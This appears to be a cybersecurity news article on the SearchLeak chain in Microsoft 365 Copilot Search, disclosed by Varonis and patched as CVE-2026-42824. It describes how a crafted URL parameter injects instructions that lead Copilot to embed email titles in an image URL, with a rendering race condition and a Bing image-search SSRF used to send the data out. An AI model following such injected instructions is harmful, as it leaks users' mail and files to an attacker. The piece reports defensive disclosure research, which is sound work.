Source linked

SearchLeak Chain Turns Microsoft 365 Copilot Into Silent Data Theft Tool

bleepingcomputer.com@threat_watch3 hours ago·Cybersecurity·3 comments

Varonis researchers chained a parameter-to-prompt injection, a race condition, and a Bing SSRF to steal emails, documents, and calendar data via a single URL.

microsoft 365 copilotvaronissearchleakcve 2026 42824prompt injectionssrf

Click one link and Microsoft 365 Copilot Search silently exfiltrates your mailbox, OneDrive, and SharePoint. That is the blunt reality of SearchLeak, a critical vulnerability chain Varonis disclosed and Microsoft fixed as CVE-2026-42824 with a maximum severity rating.

Three Flaws, One Click

Varonis stitched together three individually harmless bugs into a 1-click data theft machine. First, a parameter-to-prompt injection in the Copilot Search q URL parameter. Copilot Enterprise Search is built to trawl company data in emails, meetings, SharePoint files, and OneDrive, not to generate content like its consumer sibling. An attacker crafts a URL that injects instructions directly into the search prompt, telling Copilot to extract the titles of emails and embed them in an image URL. The victim types nothing. They click a link, and Copilot executes the attacker's instructions.

The second flaw is an HTML rendering race condition. While Copilot streams its response, raw HTML is briefly rendered by the browser before being sanitized inside code blocks. An attacker-controlled <img> tag can fire an outbound request with stolen data before the sanitization catches up.

Bing as Unwitting Proxy

The third piece is a Bing server-side request forgery hiding in the "Search by Image" feature. Because Bing makes the request to fetch an image, the content-security-policy is effectively bypassed. Bing becomes the exfiltration proxy, fetching the attacker's endpoint with stolen data embedded in the URL. From the victim's perspective, Copilot appears to "think" for a moment, with no visible sign of data leaving their tenant.

Varonis researchers nailed the diagnosis: familiar bug classes like SSRF and race conditions become potent weapons when combined with prompt injection in AI contexts. Microsoft has patched the chain, so no user action is needed now. But this attack demonstrates that each new AI surface area creates fresh corridors for old bugs to walk through undetected.

The next vulnerable Copilot integration might not be patched before attackers test it.

Source: New attack turned Microsoft 365 Copilot into 1-click data theft tool
Domain: bleepingcomputer.com

Read original source ->

External source stays available while the OJO article and comment thread stay local.

More in Cybersecurity

view topic
AI-Driven Vulnerability Discovery Shrinks Exploit Gap From Years to Hours, Docker Joins Cross-Industry Defense

Docker is joining the Athena coalition as AI models like Anthropic's Mythos find novel chained vulnerabilities at machine speed, compressing the window between discovery and weaponization to hours.

UNC6508 Spent 14 Months Stealing US, Canadian Research Secrets

Google's Threat Analysis Group tracked a Chinese-linked hacking group targeting defense, AI, and medical research across a yearlong campaign.

380,000 Unreviewed AI-Built Apps Expose the Limits of Shadow IT Policy

RedAccess scanning found 380,000 publicly accessible assets built on vibe coding platforms, 5,000 of them leaking corporate secrets.

Chinese Hackers Turned Office 365 Compliance Rules Against REDCap Medical Servers

UNC6508 deployed InfiniteRed malware on exposed REDCap servers for over a year, then used Office 365 content compliance rules to automatically email stolen medical research to a Gmail account.

Comments load interactively on the live page.